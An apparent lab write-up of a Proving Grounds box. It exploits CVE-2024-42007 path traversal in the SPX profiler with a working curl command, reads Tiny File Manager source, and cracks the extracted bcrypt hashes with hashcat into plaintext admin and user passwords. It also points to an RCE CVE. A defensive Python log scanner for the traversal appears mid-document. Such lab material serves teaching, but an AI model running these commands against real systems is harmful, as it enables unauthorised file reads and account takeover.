Arbitrary File Read


Conducting an arbitrary file read on the target system by exploiting CVE-2024-42007

Tiny File Manager


Reading the source code of the target Tiny File Manager instance, /var/www/html/index.php

Version Information


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ file=/var/www/html/index.php ; curl --path-as-is -s "http://$IP/index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=/../../../../../../../../../../../../../../../../..$file" | grep -w 'Tiny File Manager'
 * H3K | Tiny File Manager V2.5.3
define('APP_TITLE', 'Tiny File Manager');
                                            <svg version="1.0" xmlns="http://www.w3.org/2000/svg" M1008 width="100%" height="80px" viewBox="0 0 238.000000 140.000000" aria-label="H3K Tiny File Manager">
                        <p><h3><a href="https://github.com/prasathmani/tinyfilemanager" target="_blank" class="app-v-title"> Tiny File Manager <?php echo VERSION; ?></a></h3></p>
        <div class="col-3 d-none d-sm-block"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION; ?></a></div>
            <div class="col-12"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION; ?></a></div>
            $msg = 'Tiny File Manager<br>Error: Cannot load configuration';
    <meta name="description" content="Web based File Manager in PHP, Manage your files efficiently and easily with Tiny File Manager">
    <meta name="description" content="Web based File Manager in PHP, Manage your files efficiently and easily with Tiny File Manager">
    $tr['en']['AppName']        = 'Tiny File Manager';      $tr['en']['AppTitle']           = 'File Manager';

The version is 2.5.3.
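The request above reaches the web root through the SPX_UI_URI parameter. As a defender-side illustration (added here; not code from the original writeup or from the SPX or Tiny File Manager projects), the following scanner reads access-log lines in the common "combined" format, decodes the query string, and flags any SPX_UI_URI value that resolves outside the profiler's UI directory. The log lines, client addresses and the SPX_KEY value "dev" are constructed samples.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the original engagement).
SAMPLE_LOG = """\
10.0.0.5 - - [08/Apr/2025:16:40:01 +0000] "GET /index.php?SPX_KEY=dev&SPX_UI_URI=/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Apr/2025:16:40:07 +0000] "GET /index.php?SPX_KEY=dev&SPX_UI_URI=/../../../../../../../../etc/passwd HTTP/1.1" 200 1932 "-" "curl/8.5.0"
10.0.0.9 - - [08/Apr/2025:16:40:09 +0000] "GET /index.php?SPX_KEY=dev&SPX_UI_URI=%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Findex.php HTTP/1.1" 200 64410 "-" "curl/8.5.0"
10.0.0.7 - - [08/Apr/2025:16:41:00 +0000] "GET /?p=tmp HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# Apache/nginx "combined" log format: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Virtual root standing in for the directory SPX serves its UI files from (assumed name).
UI_ROOT = "/spxroot"


def escapes_ui_root(ui_uri: str) -> bool:
    """True if the SPX_UI_URI value resolves to a path above the UI directory."""
    decoded = unquote(unquote(ui_uri))  # tolerate single and double percent-encoding
    resolved = posixpath.normpath(UI_ROOT + "/" + decoded.lstrip("/"))
    return not (resolved == UI_ROOT or resolved.startswith(UI_ROOT + "/"))


def scan_access_log(text: str) -> list:
    """Return one finding per request whose SPX_UI_URI climbs out of the UI directory."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        params = parse_qs(query, keep_blank_values=True)  # parse_qs decodes %xx once
        for value in params.get("SPX_UI_URI", []):
            if escapes_ui_root(value):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "requested": unquote(unquote(value)),
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} SPX_UI_URI={f['requested']}")
```

A 200 status on a flagged request is the strongest signal, since a patched or correctly configured instance would not serve the file. The check keys on the resolved path rather than on the literal string "../" so that encoded variants are caught as well.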

Vulnerabilities


Looking up this version online reveals an RCE exploit, CVE-2021-45010.

Credentials


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ file=/var/www/html/index.php ; curl --path-as-is -s "http://$IP/index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=/../../../../../../../../../../../../../../../../..$file"
 
[...REDACTED...]

Credential hashes of both the admin and user accounts:

  • $2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG
  • $2y$10$x8PS6i0Sji2Pglyz7SLFruYFpAsz9XAYsdiPyfse6QDkB/QsdShxi

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/spx]
└─$ hashcat -a 0 -m 3200 .\hashes.txt /usr/share/wordlist/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Tue Apr 08 16:44:18 2025 (3 mins, 14 secs)
Time.Estimated...: Tue Apr 08 23:32:53 2025 (6 hours, 45 mins)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1131 H/s (9.61ms) @ Accel:1 Loops:16 Thr:24 Vec:1
Speed.#3.........:       40 H/s (11.16ms) @ Accel:1 Loops:1 Thr:16 Vec:1
Speed.#*.........:     1170 H/s
Recovered........: 0/2 (0.00%) Digests (total), 0/2 (0.00%) Digests (new), 0/2 (0.00%) Salts
Progress.........: 227280/28688770 (0.79%)
Rejected.........: 0/227280 (0.00%)
Restore.Point....: 92864/14344385 (0.65%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:688-704
Restore.Sub.#3...: Salt:1 Amplifier:0-1 Iteration:46-47
Candidate.Engine.: Device Generator
Candidates.#1....: Candyfloss -> 131280
Candidates.#3....: greg15 -> cretin
Hardware.Mon.#1..: Temp: 66c Util: 98% Core:1792MHz Mem:6001MHz Bus:8
Hardware.Mon.#3..: N/A
 
$2y$10$x8PS6i0Sji2Pglyz7SLFruYFpAsz9XAYsdiPyfse6QDkB/QsdShxi:profiler
$2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG:lowprofile
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Tue Apr 08 16:44:18 2025 (4 mins, 52 secs)
Time.Estimated...: Tue Apr 08 16:49:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1124 H/s (10.61ms) @ Accel:1 Loops:16 Thr:24 Vec:1
Speed.#3.........:       40 H/s (18.50ms) @ Accel:1 Loops:1 Thr:16 Vec:1
Speed.#*.........:     1164 H/s
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 434304/28688770 (1.51%)
Rejected.........: 0/434304 (0.00%)
Restore.Point....: 194576/14344385 (1.36%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:1008-1024
Restore.Sub.#3...: Salt:1 Amplifier:0-1 Iteration:504-505
Candidate.Engine.: Device Generator
Candidates.#1....: marta12 -> louis13
Candidates.#3....: 150215 -> 11081980
Hardware.Mon.#1..: Temp: 66c Util: 98% Core:1792MHz Mem:6001MHz Bus:8
Hardware.Mon.#3..: N/A
 
Started: Tue Apr 08 16:43:55 2025
Stopped: Tue Apr 08 16:49:11 2025

Password hashes cracked:

  • admin:lowprofile
  • user:profiler

These credentials can be used to authenticate to the target Tiny File Manager instance.